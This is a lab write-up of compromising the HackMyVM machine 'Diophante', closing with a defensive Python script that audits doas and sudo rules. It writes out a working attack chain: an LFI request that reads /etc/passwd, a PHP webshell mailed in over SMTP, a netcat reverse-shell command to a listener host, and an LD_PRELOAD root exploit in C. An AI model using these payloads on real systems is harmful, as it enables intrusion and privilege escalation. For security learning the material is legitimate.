HMV Diophante
Summary
This Linux machine starts out with SSH, a web server and a filtered SMTP service. Simple web
enumeration leaks a port-knocking note and a WordPress site. wpscan then points to an LFI
vulnerability in a WordPress plugin; I deliver a PHP webshell to a user's mailbox through the
SMTP server and include that mailbox via the LFI to get RCE and the foothold. A SUID doas binary
with permissive rules lets me move laterally to two other users, and a sudo rule that keeps
LD_PRELOAD in the environment (env_keep) ultimately leads to root.
Scope
- Name: Diophante
- Difficulty: (6/10)
- OS: Linux
- IP: diophante.hmv (192.168.56.145)
Enumeration
The nmap scan shows three services, one of them filtered:
22/tcp open     ssh
25/tcp filtered smtp
80/tcp open     http
Web
Enumerating the web service yields two critical clues.
❯ curl http://diophante.hmv/note.txt
Don't forget: 7000 8000 9000
admin
After knocking on these three ports in order, the filtered SMTP service becomes reachable.
http://diophante.hmv/blog is a WordPress site.
WordPress Vulnerability(LFI)
The wpscan output quickly points to an LFI vulnerability in the site-editor plugin.
[+] site-editor
 | Location: http://diophante.hmv/blog/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 | Readme: http://diophante.hmv/blog/wp-content/plugins/site-editor/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://diophante.hmv/blog/wp-content/plugins/site-editor/, status: 200
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
 |      - https://seclists.org/fulldisclosure/2018/Mar/40
 |      - https://github.com/SiteEditor/editor/issues/2
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://diophante.hmv/blog/wp-content/plugins/site-editor/readme.txt
Confirm that vuln with curl:
❯ curl 'http://diophante.hmv/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd' --output -
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
sabine:x:1000:1000:sabine,,,:/home/sabine:/bin/rbash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:107:114::/var/spool/postfix:/usr/sbin/nologin
leonard:x:1001:1001:,,,:/home/leonard:/bin/bash
There are two normal users, sabine (whose login shell is rbash) and leonard. I try some common files through the LFI but find nothing interesting.
Upload web shell by SMTP
The LFI only reads files, so I still need a way to execute code for the foothold. The plan: write a webshell somewhere on disk that the LFI can include. With port 25 open after the knock, SMTP is the obvious write primitive: Postfix delivers local mail to /var/mail/<user>, and the LFI reads any file www-data can open.
❯ nc diophante.hmv 25
220 debian ESMTP Postfix (Debian/GNU)
helo leonard
250 debian
mail from: <[email protected]>
250 2.1.0 Ok
rcpt to: leonard
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET["cmd"]);?>
.
250 2.0.0 Ok: queued as 1B2CC80ABC
quit
221 2.0.0 Bye
Then access it with that LFI vulnerability.
❯ curl 'http://diophante.hmv/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/leonard&cmd=id' --output -
From [email protected] Wed Apr 22 12:01:30 2026
Return-Path: <[email protected]>
X-Original-To: leonard
Delivered-To: leonard@debian
Received: from leonard (unknown [192.168.56.1])
        by debian (Postfix) with SMTP id 1B2CC80ABC
        for <leonard>; Wed, 22 Apr 2026 11:59:33 +0200 (CEST)

uid=33(www-data) gid=33(www-data) groups=33(www-data)
It works: the mail headers come back first, then the output of id. The following payload gives a reverse shell to a listener on 192.168.56.1:1234 and the foothold.
❯ curl 'http://diophante.hmv/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/leonard' -G --data-urlencode 'cmd=nc 192.168.56.1 1234 -e /bin/bash'
Privilege Escalation
SUID files
www-data@diophante:/home$ find / -mount -perm -u=s 2>/dev/null
/usr/bin/mount
/usr/bin/xclip
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/doas
/usr/bin/chsh
/usr/bin/su
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
www-data -> sabine
The SUID scan quickly turns up an interesting program, doas. Running it directly as some other
user does not work, so I check its configuration.
www-data@diophante:/home$ cat /etc/doas.conf
permit nopass www-data as sabine cmd /usr/bin/setsid
permit nopass sabine as leonard cmd /usr/bin/mutt
So I (www-data) can run setsid as sabine without a password, and setsid simply executes whatever program it is given. Things are straightforward now.
www-data@diophante:/home$ doas -u sabine /usr/bin/setsid /bin/bash
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
sabine@diophante:/home$ id
uid=1000(sabine) gid=1000(sabine) groups=1000(sabine),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
sabine -> leonard
The second doas rule lets sabine run mutt as leonard. Like less, mutt can spawn shell commands:
the ! key in mutt prompts for a shell command (its shell-escape binding), so running mutt as
leonard through doas and entering /bin/bash at that prompt gives a shell as leonard.
leonard -> root
The sudo rule of the user leonard:
leonard@diophante:~$ sudo -l
Matching Defaults entries for leonard on diophante:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
env_keep+=LD_PRELOAD
User leonard may run the following commands on diophante:
(ALL : ALL) NOPASSWD: /usr/bin/ping
Notice env_keep+=LD_PRELOAD there: sudo normally scrubs LD_PRELOAD (env_reset), but this Defaults
entry preserves it across the privilege change, so a shared library of my choice is loaded into
the root-owned ping process before its main() runs.
// exp.c: build with  gcc -shared -fPIC -nostartfiles -o exp.so exp.c
// (-nostartfiles is needed because the library defines its own _init)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// _init runs when the dynamic loader maps the library, before ping's main()
void _init() {
    unsetenv("LD_PRELOAD");   // don't preload ourselves into the child shell
    setuid(0);                // sudo already runs us as root; kept explicit
    setgid(0);
    system("/bin/bash");      // root shell; ping continues when it exits
}
Then compile it into a shared library and run ping through sudo with LD_PRELOAD pointing at it:
leonard@diophante:~$ sudo LD_PRELOAD=./exp.so /usr/bin/ping
bash: cannot set terminal process group (5380): Inappropriate ioctl for device
bash: no job control in this shell
root@diophante:/home/leonard# id
uid=0(root) gid=0(root) groups=0(root)
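The check a practitioner would want after seeing both rule sets on this box: a small auditor, added here as an example and not part of the write-up, that parses doas.conf and sudo -l output and reports rules that hand a user a shell the way Diophante's do (setsid and mutt reachable through doas, and a NOPASSWD command combined with env_keep+=LD_PRELOAD). The two inputs are the configurations quoted above, embedded as constants; SHELL_CAPABLE and CODE_LOADING_VARS are this example's own partial lists, not an authoritative catalogue.

```python
"""Audit doas.conf rules and sudo -l output for shell-granting entries (added example)."""
from __future__ import annotations

import os
import re
import shlex

# Binaries whose normal function includes running an arbitrary program or shell (partial list).
SHELL_CAPABLE = {"setsid", "mutt", "less", "more", "vi", "vim", "man", "env", "find", "bash", "sh"}
# Variables that let the caller load code into a process sudo starts as another user (partial list).
CODE_LOADING_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "PYTHONPATH", "PERL5LIB"}

# Constructed from the configurations shown in the write-up.
DOAS_CONF = """\
permit nopass www-data as sabine cmd /usr/bin/setsid
permit nopass sabine as leonard cmd /usr/bin/mutt
"""

SUDO_L = """\
Matching Defaults entries for leonard on diophante:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin,
    env_keep+=LD_PRELOAD

User leonard may run the following commands on diophante:
    (ALL : ALL) NOPASSWD: /usr/bin/ping
"""


def parse_doas(conf: str) -> list[dict]:
    """doas.conf grammar: permit|deny [options] identity [as target] [cmd command [args ...]]."""
    rules = []
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tok = shlex.split(line)
        rule = {"action": tok[0], "options": set(), "identity": None,
                "target": None, "cmd": None, "args": None}
        i = 1
        while i < len(tok):                      # options precede the identity
            if tok[i] == "setenv":               # setenv { VAR=value ... }
                j = tok.index("}", i)
                rule["options"].add(" ".join(tok[i:j + 1])); i = j + 1
            elif tok[i] in ("nopass", "nolog", "persist", "keepenv"):
                rule["options"].add(tok[i]); i += 1
            else:
                break
        if i >= len(tok):
            raise ValueError(f"rule without identity: {line}")
        rule["identity"] = tok[i]; i += 1
        while i < len(tok):
            if tok[i] == "as":
                rule["target"] = tok[i + 1]; i += 2
            elif tok[i] == "cmd":
                rule["cmd"] = tok[i + 1]; i += 2
            elif tok[i] == "args":
                rule["args"] = tok[i + 1:]; break   # fixed argument list: command is pinned
            else:
                raise ValueError(f"unexpected token {tok[i]!r} in: {line}")
        rules.append(rule)
    return rules


def audit_doas(conf: str) -> list[str]:
    """One finding per permit rule that gives the identity an unrestricted shell-capable command."""
    findings = []
    for r in parse_doas(conf):
        if r["action"] != "permit":
            continue
        target = r["target"] or "root"           # doas defaults the target user to root
        if r["cmd"] is None:
            findings.append(f"{r['identity']} may run ANY command as {target}")
        elif os.path.basename(r["cmd"]) in SHELL_CAPABLE and r["args"] is None:
            why = "nopass" if "nopass" in r["options"] else "password"
            findings.append(f"{r['identity']} -> {target} via {r['cmd']} ({why}, args unrestricted)")
    return findings


def audit_sudo_l(output: str) -> list[str]:
    """Flag every allowed command when a Defaults entry keeps a code-loading variable."""
    kept = set()
    for m in re.finditer(r'env_keep\s*\+?=\s*"?([A-Z0-9_ ]+)"?', output):
        kept.update(m.group(1).split())
    dangerous = sorted(kept & CODE_LOADING_VARS)
    if not dangerous:
        return []
    findings = []
    spec = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$", re.M)
    for m in spec.finditer(output):
        flag = " and NOPASSWD" if "NOPASSWD" in m.group("tags") else ""
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            findings.append(f"{cmd} runs as ({m.group('runas')}) with {', '.join(dangerous)} preserved{flag}")
    return findings


if __name__ == "__main__":
    for finding in audit_doas(DOAS_CONF) + audit_sudo_l(SUDO_L):
        print("[!]", finding)
```

The doas findings would disappear if the rules pinned arguments (args with a fixed list), because setsid and mutt only help when the caller chooses what they run; the sudo finding would disappear by dropping env_keep+=LD_PRELOAD, since ping itself is harmless.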